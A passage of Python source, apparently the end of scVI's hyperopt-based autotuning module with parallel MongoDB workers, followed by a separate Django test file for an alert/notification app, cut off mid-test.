+ str(trainer_specific_kwargs)
+ "\n"
+ "train method: \n"
+ str(train_func_specific_kwargs)
)
# build a partial objective function restricted to the search space
if objective_hyperopt is None:
objective_hyperopt = partial(
_objective_function,
**{
"gene_dataset": gene_dataset,
"model_class": model_class,
"trainer_class": trainer_class,
"model_specific_kwargs": model_specific_kwargs,
"trainer_specific_kwargs": trainer_specific_kwargs,
"train_func_specific_kwargs": train_func_specific_kwargs,
"use_batches": use_batches,
},
)
if parallel:
logger.info("Starting parallel hyperoptimization")
trials = _auto_tune_parallel(
objective_hyperopt=objective_hyperopt,
exp_key=exp_key,
space=space,
max_evals=max_evals,
save_path=save_path,
n_cpu_workers=n_cpu_workers,
gpu_ids=gpu_ids,
n_workers_per_gpu=n_workers_per_gpu,
reserve_timeout=reserve_timeout,
fmin_timeout=fmin_timeout,
fmin_timer=fmin_timer,
mongo_port=mongo_port,
mongo_host=mongo_host,
db_name=db_name,
multiple_hosts=multiple_hosts,
)
else:
logger.info("Starting sequential hyperoptimization")
trials = Trials()
# run hyperoptimization
_ = fmin(
fn=objective_hyperopt,
space=space,
algo=tpe.suggest,
max_evals=max_evals,
trials=trials,
)
# return best model, trained
if train_best:
logger.debug("Training best model with full training set")
best_space = trials.best_trial["result"]["space"]
best_trainer = objective_hyperopt(best_space, is_best_training=True)
if pickle_result:
if train_best:
logger.debug("Pickling best model and trainer")
# pickle trainer and save model (overkill?)
with open(
os.path.join(save_path, "best_trainer_{key}".format(key=exp_key)), "wb"
) as f:
pickle.dump(best_trainer, f)
torch.save(
best_trainer.model.state_dict(),
os.path.join(save_path, "best_model_{key}".format(key=exp_key)),
)
# remove object containing thread.lock (otherwise pickle.dump throws)
logger.debug("Pickling Trials object")
if hasattr(trials, "handle"):
del trials.handle
with open(
os.path.join(save_path, "trials_{key}".format(key=exp_key)), "wb"
) as f:
pickle.dump(trials, f)
# remove added logging handlers/formatters
_cleanup_logger()
if train_best:
return best_trainer, trials
else:
return trials
def _auto_tune_parallel(
objective_hyperopt: Callable,
exp_key: str,
space: dict = None,
max_evals: int = 100,
save_path: str = ".",
n_cpu_workers: int = None,
gpu_ids: List[int] = None,
n_workers_per_gpu: int = 1,
reserve_timeout: float = 30.0,
fmin_timeout: float = 60.0,
fmin_timer: float = None,
mongo_port: str = "1234",
mongo_host: str = "localhost",
db_name: str = "scvi_db",
multiple_hosts: bool = False,
) -> MongoTrials:
"""Parallel version of the hyperoptimization procedure.
Called by ``auto_tune_scvi_model`` when ``parallel=True``.
Specifically, first the MongoDb service is launched in its own forked process.
Then, the call to the minimization process is made in its own forked process.
Then, the call ``worker_launcher`` is made in its own Thread.
After that, the program waits for either the minimization
process to finish or for the workers to all timeout.
When one of these conditions is verified the program kills the waiter for the other
and tries to dequeue the results from the minimization process.
At that point, if ``multiple_hosts`` is set to True, the program waits indefinitely
for the minimization process to put the results in the queue.
If not, the minimisation process has ``fmin_timeout`` seconds to finish.
This mechanism ensures that the program does not hang if, for any reason,
the workers die before completing all the jobs.
Note that logs to the ``hyperopt`` package are automatically stored in ``./hyperopt_logfile.txt``.
Note that the progress bar is automatically disabled if the logging level
for ``scvi.inference.autotune`` is lower than logging.WARNING.
:param objective_hyperopt: Callable, the objective function to minimize
:param exp_key: Name of the experiment in MongoDb.
:param space: ``dict`` containing up to three sub-dicts with keys "model_tunable_kwargs",
"trainer_tunable_kwargs" or "train_func_tunable_kwargs".
Each of those dict contains ``hyperopt`` defined parameter spaces (e.g. ``hp.choice(..)``)
which will be passed to the corresponding object : model, trainer or train method
when performing hyperoptimization. Default: mutable, see source code.
:param max_evals: Maximum number of evaluations of the objective.
:param save_path: Path where to save best model, trainer, trials and mongo files.
:param n_cpu_workers: Number of cpu workers to launch. If None, and no GPUs are found,
defaults to ``os.cpucount() - 1``. Else, defaults to 0.
:param gpu_ids: Ids of the GPUs to use. If None defaults to all GPUs found by ``torch``.
Note that considered gpu ids are int from ``0`` to ``torch.cuda.device_count()``.
:param n_workers_per_gpu: Number of workers ton launch per gpu found by ``torch``.
:param reserve_timeout: Amount of time, in seconds, a worker tries to reserve a job for
before throwing a ``ReserveTimeout`` Exception.
:param fmin_timeout: Amount of time, in seconds, ``fmin_process`` has to terminate
after all workers have died - before throwing a ``FminTimeoutError``.
If ``multiple_hosts`` is set to ``True``, this is set to None to disable the timineout behaviour.
:param fmin_timer: Global amount of time allowed for fmin_process.
If not None, the minimization procedure will be stopped after ``fmin_timer`` seconds.
Used only if ``parallel`` is set to ``True``.
:param mongo_port: Port to the mongo db.
:param mongo_host: Hostname used with mongo_port to indicate the prefix of the mongodb address.
The prefix of the address passed onto the workers and MongoTrials object is ``'{mongo_host}:{mongo_port}'``.
:param db_name: Name to use when creating the Mongo database. Suffix of the mongo address.
:param multiple_hosts: If ``True``, user is considered to have workers launched on several machines.
Therefore, setting this to ``True`` disables the ``fmin_timeout`` behaviour.
:return: ``MongoTrials`` object containing the results of the program.
"""
# run mongod bash script
mongo_path = os.path.join(save_path, "mongo")
if not os.path.exists(mongo_path):
os.makedirs(mongo_path)
mongo_logfile = open(os.path.join(mongo_path, "mongo_logfile.txt"), "w")
open_files.append(mongo_logfile)
logger.debug(
"Starting MongoDb process, logs redirected to "
"{name}.".format(name=mongo_logfile.name)
)
mongod_process = Popen(
[
"mongod",
"--quiet",
"--dbpath={path}".format(path=mongo_path),
"--port={port}".format(port=mongo_port),
],
stdout=mongo_logfile,
)
mongo_port_address = os.path.join(mongo_host + ":" + mongo_port, db_name)
started_processes.append(mongod_process)
# log hyperopt to file
hp_logger = logging.getLogger("hyperopt")
fh_hyperopt = logging.FileHandler(os.path.join(save_path, "hyperopt_logfile.txt"))
fh_hyperopt.setFormatter(formatter)
hp_logger.addHandler(fh_hyperopt)
# add progress handler to progress logger
progress_logger = logging.getLogger("progress_logger")
disable = multiple_hosts or (logger.level < logging.WARNING)
pbar = tqdm.tqdm(total=max_evals, disable=disable)
progress_logger.addHandler(ProgressHandler(pbar=pbar, disable=disable))
# start by running fmin process so that workers don't timeout
# run hyperoptimization, in a forked process
# this allows to warn if the workers crash
# since mongo is not thread-safe, trials must be instantiated in each child
logger.debug("Starting minimization procedure")
queue = fork_ctx.Queue()
fmin_kwargs = {
"queue": queue,
"fn": objective_hyperopt,
"exp_key": exp_key,
"space": space,
"algo": tpe.suggest,
"max_evals": max_evals,
"fmin_timer": fmin_timer,
"show_progressbar": False, # progbar useless in parallel mode
"mongo_port_address": mongo_port_address,
}
fmin_process = fork_ctx.Process(
target=_fmin_parallel, kwargs=fmin_kwargs, name="fmin Process"
)
fmin_process.start()
started_processes.append(fmin_process)
# start worker launcher
logger.debug("Starting worker launcher")
stop_watchdog_event = threading.Event()
launcher_kwargs = {
"stop_watchdog_event": stop_watchdog_event,
"exp_key": exp_key,
"n_cpu_workers": n_cpu_workers,
"gpu_ids": gpu_ids,
"n_workers_per_gpu": n_workers_per_gpu,
"reserve_timeout": reserve_timeout,
"workdir": mongo_path,
"mongo_port_address": mongo_port_address,
"multiple_hosts": multiple_hosts,
}
workers_thread = threading.Thread(
target=launch_workers, kwargs=launcher_kwargs, name="Worker Launcher"
)
workers_thread.start()
started_threads.append(workers_thread)
# wait for workers and fmin process simultaneously
workers_done_event = threading.Event()
fmin_done_event = threading.Event()
fmin_waiter = threading.Thread(
target=_wait_for_process_or_thread,
kwargs={"process": fmin_process, "event": fmin_done_event},
name="Waiter fmin",
)
fmin_waiter.start()
started_threads.append(fmin_waiter)
workers_waiter = threading.Thread(
target=_wait_for_process_or_thread,
kwargs={"process": workers_thread, "event": workers_done_event},
name="Waiter workers",
)
workers_waiter.start()
started_threads.append(workers_waiter)
while not workers_done_event.is_set() and not fmin_done_event.is_set():
time.sleep(5)
# when one of them finishes, if it is fmin -> trials should be in the queue
# if not and not using multiple hosts we wait fmin_timeout seconds for fmin to finish
# in any case, close waiter threads
if fmin_done_event.is_set():
logger.debug("Setting worker watchdog and waiter stop events.")
stop_watchdog_event.set()
workers_done_event.set()
if workers_done_event.is_set() and not multiple_hosts:
logger.debug("Setting fmin waiter stop event.")
fmin_done_event.set()
try:
if multiple_hosts is not None:
# if using multiple_hosts, there could still be workers -> disable fmin timeout
fmin_timeout = None
logger.debug(
"multiple_hosts set to True, fmin will block until all trials have been completed."
)
else:
logger.debug(
"multiple_hosts set to false, Fmin has {time} seconds to finish".format(
time=fmin_timeout
)
)
trials = queue.get(timeout=fmin_timeout)
except Empty:
logger.error(
"Queue still empty {fmin_timeout} seconds after all workers have died."
"\n".format(fmin_timeout=fmin_timeout) + "Terminating minimization process."
)
raise FminTimeoutError(
"Queue still empty {fmin_timeout} seconds after all workers "
"have died. Check that you have used a new exp_key or allowed "
"a higher max_evals".format(fmin_timeout=fmin_timeout)
)
# sanity: wait for fmin, terminate workers and wait for launcher
fmin_process.join()
stop_watchdog_event.set()
workers_thread.join()
logger.info(
"Finished minimization procedure for experiment {exp_key}.".format(
exp_key=exp_key
)
)
logger.debug("Terminating mongod process.")
mongod_process.terminate()
# cleanup processes, threads and files
_cleanup_processes_files()
return trials
@_cleanup_decorator
def _fmin_parallel(
queue: multiprocessing.Queue,
fn: Callable,
exp_key: str,
space: dict,
algo: Callable = tpe.suggest,
max_evals: int = 100,
fmin_timer: float = None,
show_progressbar: bool = False,
mongo_port_address: str = "localhost:1234/scvi_db",
):
"""Launches a ``hyperopt`` minimization procedure.
"""
logger.debug("Instantiating trials object.")
# instantiate Trials object
trials = MongoTrials(
as_mongo_str(os.path.join(mongo_port_address, "jobs")), exp_key=exp_key
)
# run hyperoptimization in another fork to enable the use of fmin_timer
fmin_kwargs = {
"fn": fn,
"space": space,
"algo": algo,
"max_evals": max_evals,
"trials": trials,
"show_progressbar": show_progressbar,
}
fmin_thread = threading.Thread(target=fmin, kwargs=fmin_kwargs)
logger.debug("Calling fmin.")
# set fmin thread as daemon so it stops when the main process terminates
fmin_thread.daemon = True
fmin_thread.start()
started_threads.append(fmin_thread)
if fmin_timer is not None:
logging.debug(
"Timer set, fmin will run for at most {timer}".format(timer=fmin_timer)
)
start_time = time.monotonic()
run_time = 0
while run_time < fmin_timer and fmin_thread.is_alive():
time.sleep(10)
run_time = time.monotonic() - start_time
else:
logging.debug("No timer, waiting for fmin")
while True:
if not fmin_thread.is_alive():
break
else:
time.sleep(10)
logger.debug("fmin returned or timer ran out.")
# queue.put uses pickle so remove attribute containing thread.lock
if hasattr(trials, "handle"):
logger.debug("Deleting Trial handle for pickling.")
del trials.handle
logger.debug("Putting Trials in Queue.")
queue.put(trials)
def _wait_for_process_or_thread(
process: Union[multiprocessing.Process, threading.Thread], event: threading.Event
):
"""Waits for a process to finish - breaks and sets ``event`` when it does.
Can be terminated by setting event from outside or by setting the global ``cleanup_event`` of this module.
"""
logger.debug("Started waiting for {name}.".format(name=process.name))
while True:
# set event and break is process is dead
if not process.is_alive():
logger.debug("{name} died. Terminating waiter.".format(name=process.name))
event.set()
break
# break if event was set
if event.is_set():
logger.debug(
"Waiting event for {name} set from outside. "
"Terminating waiter.".format(name=process.name)
)
break
if cleanup_event.is_set():
logger.debug(
"Waiting thread for {name} cleaned up.".format(name=process.name)
)
event.set()
break
time.sleep(5)
@_cleanup_decorator
def launch_workers(
stop_watchdog_event: threading.Event(),
exp_key: str,
n_cpu_workers: int = None,
gpu_ids: List[int] = None,
n_workers_per_gpu: int = 1,
reserve_timeout: float = 30.0,
workdir: str = ".",
mongo_port_address: str = "localhost:1234/scvi_db",
multiple_hosts: bool = False,
):
"""Launches the local workers which are going to run the jobs required by the minimization process.
Terminates when the worker_watchdog call finishes.
Specifically, first ``n_gpu_workers`` are launched per GPU in ``gpu_ids`` in their own spawned process.
Then, ``n_cpu_workers`` CPU workers are launched, also in their own spawned process.
The use of spawned processes (each have their own python interpreter) is mandatory for compatiblity with CUDA.
See https://pytorch.org/docs/stable/notes/multiprocessing.html for more information.
:param stop_watchdog_event: When set, this event stops the watchdog Thread
which checks that local workers are still running.
:param exp_key: This key is used by hyperopt as a suffix to the part of the MongoDb
which corresponds to the current experiment. In particular, it has to be passed to ``MongoWorker``.
:param n_cpu_workers: Number of cpu workers to launch. If None, and no GPUs are found,
defaults to ``os.cpu_count() - 1``. Else, defaults to 0.
:param gpu_ids: Ids of the GPUs to use. If None defaults to all GPUs found by ``torch``.
Note that considered gpu ids are int from ``0`` to ``torch.cuda.device_count()``.
:param n_workers_per_gpu: Number of workers ton launch per gpu found by ``torch``.
:param reserve_timeout: Amount of time, in seconds, a worker tries to reserve a job for
before throwing a ``ReserveTimeout`` Exception.
:param workdir: Directory where the workers
:param mongo_port_address: Address to the running MongoDb service.
:param multiple_hosts: ``True`` if launching workers form multiple hosts.
"""
# prepare parallel logging
_logging_queue = spawn_ctx.Queue()
listener = QueueListener(_logging_queue, DispatchHandler())
listener.start()
started_processes.append(listener)
if gpu_ids is None:
n_gpus = torch.cuda.device_count()
logger.debug(
"gpu_ids is None, defaulting to all {n_gpus} GPUs found by torch.".format(
n_gpus=n_gpus
)
)
gpu_ids = list(range(n_gpus))
if n_gpus and n_cpu_workers is None:
n_cpu_workers = 0
logging.debug(
"Some GPU.s found and n_cpu_wokers is None, defaulting to n_cpu_workers = 0"
)
if not n_gpus and n_cpu_workers is None:
n_cpu_workers = os.cpu_count() - 1
logging.debug(
"No GPUs found and n_cpu_wokers is None, defaulting to n_cpu_workers = "
"{n_cpu_workers} (os.cpu_count() - 1)".format(
n_cpu_workers=n_cpu_workers
)
)
if (
gpu_ids is None
and (n_cpu_workers == 0 or n_cpu_workers is None)
and not multiple_hosts
):
raise ValueError("No hardware (cpu/gpu) selected/found.")
# log progress with queue and progress_listener
progress_queue = spawn_ctx.Queue()
prog_listener_kwargs = {
"progress_queue": progress_queue,
"logging_queue": _logging_queue,
}
prog_listener = spawn_ctx.Process(
target=progress_listener, kwargs=prog_listener_kwargs, name="Progress listener"
)
prog_listener.start()
started_processes.append(prog_listener)
running_workers = []
# launch gpu workers
logger.info(
"Starting {n_workers_per_gpu} worker.s for each of the {n_gpus} gpu.s set for use/"
"found.".format(n_workers_per_gpu=n_workers_per_gpu, n_gpus=len(gpu_ids))
)
for gpu_id in gpu_ids:
for sub_id in range(n_workers_per_gpu):
worker_kwargs = {
"progress_queue": progress_queue,
"logging_queue": _logging_queue,
"exp_key": exp_key,
"workdir": workdir,
"gpu": True,
"hw_id": str(gpu_id),
"reserve_timeout": reserve_timeout,
"mongo_port_address": mongo_port_address,
}
p = spawn_ctx.Process(
target=hyperopt_worker,
kwargs=worker_kwargs,
name="Worker GPU " + str(gpu_id) + ":" + str(sub_id),
)
p.start()
running_workers.append(p)
# launch cpu workers
# TODO: add cpu affinity?
logger.info(
"Starting {n_cpu_workers} cpu worker.s".format(n_cpu_workers=n_cpu_workers)
)
for cpu_id in range(n_cpu_workers):
worker_kwargs = {
"progress_queue": progress_queue,
"logging_queue": _logging_queue,
"exp_key": exp_key,
"workdir": workdir,
"gpu": False,
"hw_id": str(cpu_id),
"reserve_timeout": reserve_timeout,
"mongo_port_address": mongo_port_address,
}
p = spawn_ctx.Process(
target=hyperopt_worker,
kwargs=worker_kwargs,
name="Worker CPU " + str(cpu_id),
)
# FIXME won't terminate if parent is killed (SIGKILL)
p.start()
running_workers.append(p)
started_processes.extend(running_workers)
# wait or return if all workers have died
workers_watchdog(running_workers=running_workers, stop_event=stop_watchdog_event)
logger.debug("Worker watchdog finished, terminating workers and closing listener.")
for worker in running_workers:
if worker.is_alive():
worker.terminate()
listener.stop()
prog_listener.terminate()
@_cleanup_decorator
def progress_listener(progress_queue, logging_queue):
"""Listens to workers when they finish a job and logs progress.
Workers put in the progress_queue when they finish a job
and when they do this function sends a log to the progress logger.
"""
# write all logs to queue
root_logger = logging.getLogger()
root_logger.setLevel(logging.DEBUG)
queue_handler = QueueHandler(logging_queue)
queue_handler.setLevel(logging.DEBUG)
root_logger.addHandler(queue_handler)
logger.debug("Listener listening...")
progress_logger = logging.getLogger("progress_logger")
i = 0
while True:
# get job done signal
progress_queue.get()
i += 1
logger.info("{i} job.s done".format(i=i))
# update progress bar through ProgressHandler
progress_logger.info(None)
if cleanup_event.is_set():
break
def hyperopt_worker(
progress_queue: multiprocessing.Queue,
logging_queue: multiprocessing.Queue,
exp_key: str,
workdir: str = ".",
gpu: bool = True,
hw_id: str = None,
poll_interval: float = 1.0,
reserve_timeout: float = 30.0,
mongo_port_address: str = "localhost:1234/scvi_db",
):
"""Launches a ``hyperopt`` ``MongoWorker`` which runs jobs until ``ReserveTimeout`` is raised.
:param progress_queue: Queue in which to put None when a job is done.
:param logging_queue: Queue to send logs to using a ``QueueHandler``.
:param exp_key: This key is used by hyperopt as a suffix to the part of the MongoDb
which corresponds to the current experiment. In particular, it has to be passed to ``MongoWorker``.
:param workdir:
:param gpu: If ``True`` means a GPU is to be used.
:param hw_id: Id of the GPU to use. set via env variable ``CUDA_VISIBLE_DEVICES``.
:param poll_interval: Time to wait between attempts to reserve a job.
:param reserve_timeout: Amount of time, in seconds, a worker tries to reserve a job for
before throwing a ``ReserveTimeout`` Exception.
:param mongo_port_address: Addres to the running MongoDb service.
"""
# write all logs to queue
root_logger = logging.getLogger()
root_logger.setLevel(logging.DEBUG)
queue_handler = QueueHandler(logging_queue)
queue_handler.setLevel(logging.DEBUG)
root_logger.addHandler(queue_handler)
logger.debug("Worker working...")
os.environ["CUDA_VISIBLE_DEVICES"] = hw_id if gpu else str()
# FIXME is this stil necessary?
sys.path.append(".")
mjobs = MongoJobs.new_from_connection_str(
os.path.join(as_mongo_str(mongo_port_address), "jobs")
)
mworker = MongoWorker(mjobs, float(poll_interval), workdir=workdir, exp_key=exp_key)
while True:
# FIXME we don't protect ourselves from memory leaks, bad cleanup, etc.
try:
mworker.run_one(reserve_timeout=float(reserve_timeout))
progress_queue.put(None)
except ReserveTimeout:
logger.debug(
"Caught ReserveTimeout. "
"Exiting after failing to reserve job for {time} seconds.".format(
time=reserve_timeout
)
)
break
def workers_watchdog(
running_workers: List[multiprocessing.Process], stop_event: threading.Event()
):
"""Checks that workers in running_workers are stil running.
If none are running anymore, inform user and finish.
"""
while True:
one_alive = False
for worker in running_workers:
one_alive = one_alive or worker.is_alive()
# if all workers are dead, inform user
if not one_alive:
logger.debug(
"All workers have died, check stdout/stderr for error tracebacks."
)
break
if stop_event.is_set():
logger.debug("Stopping Event set, stopping worker watchdog.")
break
if cleanup_event.is_set():
logger.debug("Cleaning up Event set, stopping worker watchdog.")
stop_event.set()
break
time.sleep(5)
def _objective_function(
space: dict,
gene_dataset: GeneExpressionDataset,
model_class: Type[VAE] = VAE,
trainer_class: Type[Trainer] = UnsupervisedTrainer,
model_specific_kwargs: dict = None,
trainer_specific_kwargs: dict = None,
train_func_specific_kwargs: dict = None,
use_batches: bool = False,
is_best_training: bool = False,
) -> Union[Dict[str, Any], Trainer]:
"""Objective function for automatic hyperparameter optimization.
Train a scVI model and return the best value of the early-stopping metric (e.g, log-likelihood).
Convention: fixed parameters (no default) have precedence over tunable parameters (default).
:param space: dict containing up to three sub-dicts with keys "model_tunable_kwargs",
"trainer_tunable_kwargs" or "train_func_tunable_kwargs".
Each of those dict contains hyperopt defined parameter spaces (e.g. ``hp.choice(..)``)
which will be passed to the corresponding object : model, trainer or train method
when performing hyperoptimization.
:param gene_dataset: scVI gene dataset
:param model_class: scVI model class (e.g ``VAE``, ``VAEC``, ``SCANVI``)
:param trainer_class: Trainer class (e.g ``UnsupervisedTrainer``)
:param model_specific_kwargs: dict of fixed parameters which will be passed to the model.
:param trainer_specific_kwargs: dict of fixed parameters which will be passed to the trainer.
:param train_func_specific_kwargs: dict of fixed parameters which will be passed to the train method.
:param use_batches: If False, pass n_batch=0 to model else pass gene_dataset.n_batches
:param is_best_training: True if training the model with the best hyperparameters
:return: best value of the early stopping metric, and best model if is_best_training
"""
start_time = time.monotonic()
# hyperopt params
space = defaultdict(dict, space)
model_tunable_kwargs = space["model_tunable_kwargs"]
trainer_tunable_kwargs = space["trainer_tunable_kwargs"]
train_func_tunable_kwargs = space["train_func_tunable_kwargs"]
# use_cuda default
if "use_cuda" not in trainer_specific_kwargs:
trainer_specific_kwargs["use_cuda"] = bool(torch.cuda.device_count())
if "n_epochs" not in {**train_func_specific_kwargs, **train_func_tunable_kwargs}:
train_func_specific_kwargs["n_epochs"] = 1000
# add hardcoded parameters
# disable scVI progbar
trainer_specific_kwargs["show_progbar"] = False
if is_best_training:
trainer_specific_kwargs["train_size"] = 1.0
# no monitoring, will crash otherwise
trainer_specific_kwargs["frequency"] = None
trainer_specific_kwargs["early_stopping_kwargs"] = {}
else:
# evaluate at each epoch
trainer_specific_kwargs["frequency"] = 1
# merge params with fixed param precedence
model_tunable_kwargs.update(model_specific_kwargs)
trainer_tunable_kwargs.update(trainer_specific_kwargs)
train_func_tunable_kwargs.update(train_func_specific_kwargs)
if not is_best_training:
logger.info(
"Parameters being tested: \n"
"model: \n"
+ str(model_tunable_kwargs)
+ "\n"
+ "trainer: \n"
+ str(trainer_tunable_kwargs)
+ "\n"
+ "train method: \n"
+ str(train_func_tunable_kwargs)
)
# define model
logger.debug("Instantiating model")
model = model_class(
n_input=gene_dataset.nb_genes,
n_batch=gene_dataset.n_batches * use_batches,
**model_tunable_kwargs,
)
# define trainer
logger.debug("Instantiating trainer")
trainer = trainer_class(model, gene_dataset, **trainer_tunable_kwargs)
# train model
logger.debug("Starting training")
trainer.train(**train_func_tunable_kwargs)
logger.debug("Finished training")
elapsed_time = time.monotonic() - start_time
# if training the best model, return model else return criterion
if is_best_training:
return trainer
else:
# select metric from early stopping kwargs if possible
metric = None
early_stopping_kwargs = trainer_specific_kwargs.get(
"early_stopping_kwargs", None
)
if early_stopping_kwargs is not None:
metric = early_stopping_kwargs.get("early_stopping_metric", None)
# store run results
if metric is not None:
early_stopping_loss_is_best = True
best_epoch = trainer.best_epoch
# add actual number of epochs to be used when training best model
space["train_func_tunable_kwargs"]["n_epochs"] = best_epoch
early_stopping_loss = trainer.early_stopping.best_performance
metric += "_" + trainer.early_stopping.on
# default to elbo
else:
early_stopping_loss_is_best = False
metric = "elbo_test_set"
early_stopping_loss = trainer.history[metric][-1]
best_epoch = len(trainer.history[metric])
# compute true ll
loss = trainer.test_set.marginal_ll(n_mc_samples=100)
logger.debug(
"Training of {n_epochs} epochs finished in {time} with loss = {loss}".format(
n_epochs=len(trainer.history[metric]),
time=str(datetime.timedelta(seconds=elapsed_time)),
loss=loss,
)
)
# check status
status = STATUS_OK
if np.isnan(loss):
status = STATUS_FAIL
return {
"loss": loss,
"early_stopping_loss": early_stopping_loss,
"early_stopping_loss_is_best": early_stopping_loss_is_best,
"best_epoch": best_epoch,
"elapsed_time": elapsed_time,
"status": status,
"history": trainer.history,
"space": space,
"worker_name": multiprocessing.current_process().name,
}
|
tests.py
|
import time
from uuid import uuid1
from datetime import datetime, timedelta
from threading import Thread
from django.test import TestCase, TransactionTestCase
from django.contrib.auth.models import User, Group
from django.core import management, mail
from django.core.mail import send_mail
from django.conf import settings
from django.db.models.signals import post_save
from alert.utils import BaseAlert, ALERT_TYPES, BaseAlertBackend, ALERT_BACKENDS,\
super_accepter, unsubscribe_user
from alert.exceptions import AlertIDAlreadyInUse, AlertBackendIDAlreadyInUse, CouldNotSendError
from alert.models import Alert, AlertPreference, AdminAlert
from alert.forms import AlertPreferenceForm, UnsubscribeForm
from alert.signals import admin_alert_saved
from alert.admin import AdminAlertAdmin
class SubclassTestingAlert(BaseAlert):
"""
This will never send any alerts - it's just a check to make sure that
subclassing alerts doesn't explode
"""
title = 'Welcome new users'
description = 'When a new user signs up, send them a welcome email'
signal = post_save
sender = User
default = True
def before(self, **kwargs):
return False
def get_applicable_users(self, instance, **kwargs):
return [instance]
class WelcomeAlert(SubclassTestingAlert):
"""
everything is inherited from SubclassTestingAlert
only change is that alerts will actually be sent
"""
def before(self, created, **kwargs):
return created
class DummyBackend(BaseAlertBackend):
title = "Dummy"
def send(self, alert):
pass
class EpicFailBackend(BaseAlertBackend):
"""
Backend that fails to send on the first try for every alert
"""
id = "EpicFail"
title = "Epic Fail"
def send(self, alert):
if not alert.failed:
raise CouldNotSendError
class SlowBackend(BaseAlertBackend):
"""
Backend that takes a full second to send an alert
"""
title = "Slow backend"
def send(self, alert):
time.sleep(1)
send_mail("asdf", 'woot', 'fake@gmail.com', ['superfake@gmail.com'])
#################################################
### Tests ###
#################################################
class AlertTests(TestCase):
def setUp(self):
pass
def test_alert_creation(self):
username = str(uuid1().hex)[:16]
email = "%s@example.com" % username
user = User.objects.create(username=username, email=email)
alerts = Alert.objects.filter(user=user)
self.assertEqual(len(alerts), len(ALERT_BACKENDS))
for alert in alerts:
self.assertEqual(alert.alert_type, "WelcomeAlert")
if alert.backend == 'EmailBackend':
self.assertEqual(alert.title, "email subject")
self.assertEqual(alert.body, "email body")
else:
self.assertEqual(alert.title, "default title")
self.assertEqual(alert.body, "default body")
def test_alert_registration_only_happens_once(self):
self.assertTrue(isinstance(ALERT_TYPES["WelcomeAlert"], WelcomeAlert))
self.assertEquals(len(ALERT_TYPES), 3)
def define_again():
class WelcomeAlert(BaseAlert):
title = 'Welcome new users'
signal = post_save
self.assertRaises(AlertIDAlreadyInUse, define_again)
def test_alert_id_is_key_in_ALERT_TYPES(self):
for key, alert in ALERT_TYPES.items():
self.assertEqual(key, alert.id)
class AlertBackendTests(TestCase):
def setUp(self):
username = str(uuid1().hex)[:16]
email = "%s@example.com" % username
self.user = User.objects.create(username=username, email=email)
def test_backend_creation(self):
self.assertTrue(isinstance(ALERT_BACKENDS["DummyBackend"], DummyBackend))
def test_backends_use_supplied_id(self):
self.assertTrue(isinstance(ALERT_BACKENDS["EpicFail"], EpicFailBackend))
def test_pending_manager(self):
self.assertEqual(Alert.pending.all().count(), len(ALERT_BACKENDS))
management.call_command("send_alerts")
self.assertEqual(Alert.pending.all().count(), 1)
def test_backend_registration_only_happens_once(self):
self.assertEquals(len(ALERT_BACKENDS), 4)
def define_again():
class DummyBackend(BaseAlertBackend):
title = 'dummy'
self.assertRaises(AlertBackendIDAlreadyInUse, define_again)
def test_backend_fails_to_send(self):
alert_that_should_fail = Alert.objects.filter(backend='EpicFail')[0]
before_send = datetime.now()
alert_that_should_fail.send()
after_send = datetime.now()
self.assertTrue(alert_that_should_fail.failed)
self.assertFalse(alert_that_should_fail.is_sent)
self.assertTrue(alert_that_should_fail.last_attempt is not None)
self.assertTrue(alert_that_should_fail.last_attempt > before_send)
self.assertTrue(alert_that_should_fail.last_attempt < after_send)
# and now retry
before_send = datetime.now()
alert_that_should_fail.send()
after_send = datetime.now()
self.assertFalse(alert_that_should_fail.failed)
self.assertTrue(alert_that_should_fail.is_sent)
self.assertTrue(alert_that_should_fail.last_attempt is not None)
self.assertTrue(alert_that_should_fail.last_attempt > before_send)
self.assertTrue(alert_that_should_fail.last_attempt < after_send)
class ConcurrencyTests(TransactionTestCase):
def setUp(self):
username = str(uuid1().hex)[:16]
email = "%s@example.com" % username
self.user = User.objects.create(username=username, email=email)
def testMultipleSimultaneousSendScripts(self):
# Sqlite uses an in-memory database, which does not work with the concurrency tests.
if "sqlite" in settings.DATABASES['default']['ENGINE']:
# Note that the alert django app will work fine with Sqlite. It's only the
# concurrency *tests* that do not work with sqlite.""")
return
self.assertEqual(len(mail.outbox), 0)
threads = [Thread(target=management.call_command, args=('send_alerts',)) for i in range(100)]
for t in threads:
t.start()
# space them out a little tiny bit
time.sleep(0.001)
[t.join() for t in threads]
self.assertEqual(len(mail.outbox), 2)
class EmailBackendTests(TestCase):
def setUp(self):
pass
class FormTests(TestCase):
def setUp(self):
self.user = User.objects.create(username='wootz', email='wootz@woot.com')
def testNoArgs(self):
pref_form = self.assertRaises(TypeError, AlertPreferenceForm)
unsubscribe_form = self.assertRaises(TypeError, UnsubscribeForm)
def testSimpleCase(self):
pref_form = AlertPreferenceForm(user=self.user)
unsubscribe_form = UnsubscribeForm(user=self.user)
self.assertEqual(len(pref_form.fields), len(ALERT_TYPES) * len(ALERT_BACKENDS))
self.assertEqual(len(unsubscribe_form.fields), len(ALERT_TYPES) * len(ALERT_BACKENDS))
def testUnsubscribeFormHasNoVisibleFields(self):
from django.forms import HiddenInput
unsubscribe_form = UnsubscribeForm(user=self.user)
for field in unsubscribe_form.fields.values():
self.assertTrue(isinstance(field.widget, HiddenInput))
def testSuperAccepterNone(self):
types = super_accepter(None, ALERT_TYPES)
backends = super_accepter(None, ALERT_BACKENDS)
self.assertEqual(len(types), len(ALERT_TYPES))
self.assertEqual(len(backends), len(ALERT_BACKENDS))
def testSuperAccepterSingle(self):
backends_by_class = super_accepter(EpicFailBackend, ALERT_BACKENDS)
backends_by_id = super_accepter("EpicFail", ALERT_BACKENDS)
self.assertEqual(len(backends_by_class), 1)
self.assertEqual(len(backends_by_id), 1)
self.assertEqual(backends_by_class, backends_by_id)
def testSuperAccepterList(self):
backends_by_class = super_accepter([EpicFailBackend, DummyBackend], ALERT_BACKENDS)
backends_by_id = super_accepter(["EpicFail", "DummyBackend"], ALERT_BACKENDS)
backends_by_mixed = super_accepter(["EpicFail", DummyBackend], ALERT_BACKENDS)
self.assertEqual(len(backends_by_class), 2)
self.assertEqual(len(backends_by_id), 2)
self.assertEqual(len(backends_by_mixed), 2)
self.assertEqual(backends_by_class, backends_by_id)
self.assertEqual(backends_by_class, backends_by_mixed)
self.assertEqual(backends_by_mixed, backends_by_id)
def testSuperAccepterDuplicates(self):
backends = super_accepter([EpicFailBackend, DummyBackend, "EpicFail"], ALERT_BACKENDS)
self.assertEqual(len(backends), 2)
def testUnsubscribe(self):
details = {
"alert_type": WelcomeAlert.id,
"backend": EpicFailBackend.id,
"user": self.user,
}
